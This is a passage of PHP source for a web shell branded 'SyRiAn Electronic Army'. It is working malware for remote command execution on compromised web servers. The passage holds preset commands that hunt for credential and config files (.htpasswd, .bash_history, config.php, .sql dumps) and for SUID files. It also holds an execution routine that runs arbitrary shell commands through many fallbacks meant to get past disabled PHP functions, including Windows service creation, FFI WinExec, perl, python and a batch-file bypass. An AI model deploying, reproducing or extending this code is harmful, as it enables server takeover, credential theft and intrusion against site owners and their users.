769.     else {$safe_mode = '<font color="red">ON</font>';}
770.     return $safe_mode;
771. }
772. function DisableFunctions() {
773.     $disfun = ini_get('disable_functions');
774.     if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
775. }
776. function RegisterGlobals() {
777.     if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
778.     else{$registerg= '<font color="green">OFF</font>';}return $registerg;
779. }
780. function GetRealIP() {
781.     if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
782.     elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
783.     else {$ip=getenv(REMOTE_ADDR);}
784.     return $ip;
785. }
786. function SelectCommand($os) {
787.     global $os;
788.     if($os == 'Windows') {
789.         echo "
790.         <select name='alias' id='alias' onChange='AddAlias();' >
791.         <option value=''>NONE</option> 
792.         <option value='dir' >List Directory</option>
793.         <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
794.         <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;</option>
795.         <option value='netstat -an'>Show active connections</option>
796.         <option value='net start'>Show running services</option>
797.         <option value='tasklist'>Show Pro</option>
798.         <option value='net user'>User accounts</option>
799.         <option value='net view'>Show computers</option>
800.         <option value='arp -a'>ARP Table</option>
801.         <option value='ipconfig /all'>IP Configuration</option>
802.         <option value='netstat -an'>netstat -an</option>
803.         <option value='systeminfo'>System Informations</option>
804.         <option value='getmac'>Get Mac Address</option>
805.         </select>
806.         ";
807.     }
808.     else {
809.         echo "
810.         <select name='alias' id='alias' onChange='AddAlias();' >
811.         <option value=''>NONE</option> 
812.         <option value='ls -la'>List dir</option>
813.         <option value='cat /etc/hosts'>IP Addresses</option>
814.         <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
815.         <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
816.         <option value='netstat -an | grep -i listen'>show opened ports</option>
817.         <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
818.         <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
819.         <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
820.         <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
821.         <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
822.         <option value='find / -type f -name \"config*\"'>find config* files</option>
823.         <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
824.         <option value='find / -perm -2 -ls'>find all writable folders and files</option>
825.         <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
826.         <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
827.         <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
828.         <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
829.         <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
830.         <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
831.         <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
832.         <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
833.         <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
834.         <option value='locate httpd.conf'>locate httpd.conf files</option>
835.         <option value='locate vhosts.conf'>locate vhosts.conf files</option>
836.         <option value='locate proftpd.conf'>locate proftpd.conf files</option>
837.         <option value='locate psybnc.conf'>locate psybnc.conf files</option>
838.         <option value='locate my.conf'>locate my.conf files</option>
839.         <option value='locate admin.php'>locate admin.php files</option>
840.         <option value='locate cfg.php'>locate cfg.php files</option>
841.         <option value='locate conf.php'>locate conf.php files</option>
842.         <option value='locate config.dat'>locate config.dat files</option>
843.         <option value='locate config.php'>locate config.php files</option>
844.         <option value='locate config.inc'>locate config.inc files</option>
845.         <option value='locate config.inc.php'>locate config.inc.php</option>
846.         <option value='locate config.default.php'>locate config.default.php files</option>
847.         <option value='locate config'>locate config* files </option>
848.         <option value='locate \".conf\"'>locate .conf files</option>
849.         <option value='locate \".pwd\"'>locate .pwd files</option>
850.         <option value='locate \".sql\"'>locate .sql files</option>
851.         <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
852.         <option value='locate \".bash_history\"'>locate .bash_history files</option>
853.         <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
854.         <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
855.         <option value='locate backup'>locate backup files</option>
856.         <option value='locate dump'>locate dump files</option>
857.         <option value='locate priv'>locate priv files</option>
858.         </select>
859.         ";
860.     }
861. }
862. function CSS($sh3llColor) {
863.     $css =  "
864.     <style>
865.     BODY
866.     {
867.         FONT-FAMILY: Verdana;
868.         margin: 2;
869.         background-color: #000000;
870.         color:white;
871.         font-size:10pt;
872.     }
873.     sy  
874.     {
875.         color:".$sh3llColor.";
876.         font-size:7pt;
877.     }
878.     #Box
879.     {
880.         color:".$sh3llColor.";
881.         background-color:#000;
882.         font-size:14px;
883.         font-weight:bold;
884.  
885.         border:none;
886.     }
887.     table
888.     {
889.         border:none;
890.         BORDER:  #eeeeee  outset;
891.         BACKGROUND-COLOR: #000000;
892.         color: #cccccc;
893.         font-size:10px;
894.     }
895.     tr
896.     {
897.         BORDER-RIGHT:  #cccccc 1px solid;
898.         BORDER-TOP:    #cccccc 1px solid;
899.         BORDER-LEFT:   #cccccc 1px solid;
900.         BORDER-BOTTOM: #cccccc 1px solid;
901.         color: #ffffff;
902.     }
903.     td
904.     {
905.         BORDER-RIGHT:  #cccccc 1px solid;
906.         BORDER-TOP:    #cccccc 1px solid;
907.         BORDER-LEFT:   #cccccc 1px solid;
908.         BORDER-BOTTOM: #cccccc 1px solid;
909.         color: #cccccc;
910.     }
911.  
912.     input
913.     {
914.         BORDER-RIGHT:  ".$sh3llColor." 1px solid;
915.         BORDER-TOP:    ".$sh3llColor." 1px solid;
916.         BORDER-LEFT:   ".$sh3llColor." 1px solid;
917.         BORDER-BOTTOM: ".$sh3llColor." 1px solid;
918.         BACKGROUND-COLOR: #333333;
919.         font: 9pt tahoma;
920.         color: #ffffff;
921.     }
922.     select
923.     {
924.         BORDER-RIGHT:  #ffffff 1px solid;
925.         BORDER-TOP:    #999999 1px solid;
926.         BORDER-LEFT:   #999999 1px solid;
927.         BORDER-BOTTOM: #ffffff 1px solid;
928.         BACKGROUND-COLOR: #000000;
929.         font: 9pt tahoma;
930.         color: #CCCCCC;;
931.     }
932.     submit
933.     {
934.         BORDER:  1px outset buttonhighlight;
935.         BACKGROUND-COLOR: #272727;
936.         width: 40%;
937.         color: #cccccc;
938.     }
939.     textarea
940.     {
941.         BORDER-RIGHT:  #ffffff 1px solid;
942.         BORDER-TOP:    #999999 1px solid;
943.         BORDER-LEFT:   #999999 1px solid;
944.         BORDER-BOTTOM: #ffffff 1px solid;
945.         BACKGROUND-COLOR: #333333;
946.         color: #ffffff;
947.     }
948.     .Save{
949.         width:500px;   
950.         border-color:red;
951.     }
952.     A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
953.     A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
954.     A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
955.     A:hover {color:blue;TEXT-DECORATION: none;}
956.     </style>
957.     <script>
958.     function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\");    }
959.     function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
960.     function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>';    }
961.     function change_dir_mode() {
962.         var dir_mode = document.getElementById('dir_mode').value;
963.         document.location = '?dir_mode='+dir_mode;
964.     }
965.     </script>
966.     ";
967.     return $css;
968. }
969. function filter($string) {
970.     if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
971.     else{return $string;    }
972. }
973. function footer() {
974.     echo '
975.     <table width="100%">
976.     <tr>
977.     <td width="100%"><center>
978.     <sy>  ~~<< </sy>SyRiAn Electronic Army<sy> >>~~</sy></b><br/>
979.     <sy>  ~~<< </sy><a href="http://www.syrian-es.com" target="_blank">www.syrian-es.com</a><sy> >>~~</sy></b><br />
980.     <sy>  ~~<< </sy>[email protected]<sy> >>~~</sy></b>
981.     </center></td>
982.     </tr>
983.     </table>
984.     </body></html>
985.     ';
986. }
987. function print_exe_method() {
988.     global $os; global $exec_method;
989.     if($os == "Linux") {
990.         ?>
991.         <select name="exe_method" >
992.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
993.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
994.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
995.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
996.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
997.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
998.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
999.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
1000.         </select>
1001.         <?php
1002.     } else {
1003.         ?>
1004.         <select name="exe_method" >
1005.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
1006.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
1007.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
1008.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
1009.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
1010.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
1011.             <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
1012.             <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
1013.             <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
1014.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
1015.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
1016.             <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
1017.         </select>
1018.         <?php
1019.     }
1020. }
1021. function Exe($command) {
1022.     global $dir;global $os;global $exec_method;
1023.     $command = filter($command);
1024.    
1025.     if($exec_method == "exec") {
1026.         exec($command,$output);echo join("\n",$output);
1027.     } else if($exec_method == "system") {
1028.         system($command);
1029.     } else if($exec_method == "shell_exec") {
1030.         echo shell_exec($command);
1031.     } else if($exec_method == "passthru") {
1032.         passthru($command);
1033.     } else if($exec_method == "proc_open") {
1034.         echo proc_exec($command,$dir);
1035.     } else if($exec_method == "popen") {
1036.         $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
1037.     } else if($exec_method == "win_shell_execute") {
1038.         echo winshell($command);
1039.     } else if($exec_method == "win32_create_service") {
1040.         echo srvshell($command);
1041.     } else if($exec_method == "ffi") {
1042.         echo ffishell($command);
1043.     } else if($exec_method == "perl") {
1044.         echo perlshell($command);
1045.     } else if($exec_method == "python") {
1046.         echo python_eval("import os\nos.system('".$command."')");
1047.     } else if($exec_method == "slash_bypass") {
1048.         echo slashBypass($command);
1049.     }
1050. }
1051. function proc_exec($com , $dir) {
1052.     $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
1053.     $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
1054.     return stream_get_contents($pipes[1]);
1055. }
1056. function winshell($command) {
1057.     $name=whereistmP()."\\".uniqid('NJ');
1058.     win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
1059.     sleep(1);
1060.     $exec=file_get_contents($name);
1061.     DeleteFile($name);
1062.     return $exec;
1063. }
1064. function srvshell($command) {
1065.     $name=whereistmP()."\\".uniqid('NJ');
1066.     $n=uniqid('NJ');
1067.     $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
1068.     win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
1069.     win32_start_service($n);
1070.     win32_stop_service($n);
1071.     win32_delete_service($n);
1072.     while(!file_exists($name))sleep(1);
1073.     $exec=file_get_contents($name);
1074.     DeleteFile($name);
1075.     return $exec;
1076. }
1077. function ffishell($command) {
1078.     $name=whereistmP()."\\".uniqid('NJ');
1079.     $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
1080.     $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
1081.     while(!file_exists($name))sleep(1);
1082.     $exec=file_get_contents($name);
1083.     DeleteFile($name);
1084.     return $exec;
1085. }
1086. function perlshell($command) {
1087.     $perl=new perl();
1088.     ob_start();
1089.     $perl->eval("system('".$command."')");
1090.     $exec=ob_get_contents();
1091.     ob_end_clean();
1092.     return $exec;
1093. }
1094. function slashBypass($cmd) {
1095.     GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
1096.     exec("\start cmd.bat");
1097.     $content = file_get_contents('sy3.txt');
1098.     unlink('sy3.txt');
1099.     return $content;
1100. }
1101. function GenerateFile($name,$content) {
1102.     if(function_exists('fopen') && function_exists('fclose')) {
1103.         $file = fopen($name,"w+");
1104.         if($file) {
1105.             if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }   
1106.             else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
1107.             else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
1108.             if(!$writeFile){return false;}
1109.         }
1110.         else{return false;}fclose($file);return true;
1111.     }
1112. }
1113. function ScanDirs() {
1114.     global $os; global $dir;global $safeMode;global $dir_mode;
1115.     if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
1116.     else {
1117.         $result .= "Perms   Size    Time        Owner/Group R/W Type    File
1118. -----------------------------------------------------------------------------
1119. ";
1120.         $handel = opendir($dir);
1121.         while(($file = readdir($handel))!= false)
1122.         {
1123.             $size = filesize($file);
1124.             if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
1125.             if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
1126.             if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
1127.             $perms = fileperms($file);
1128.             $time = date("y/m/d", filectime($file));
1129.             if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
1130.             if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
1131.             $result .= $perms." ".$size."   ".$time."   ".$owner."/".$group."   ".$isReadable."/".$isWritable." ".$type."   ".$file."
1132. ";
1133.         }
1134.     }
1135.     return $result;
1136. }
1137. echo footer();
1138. ?>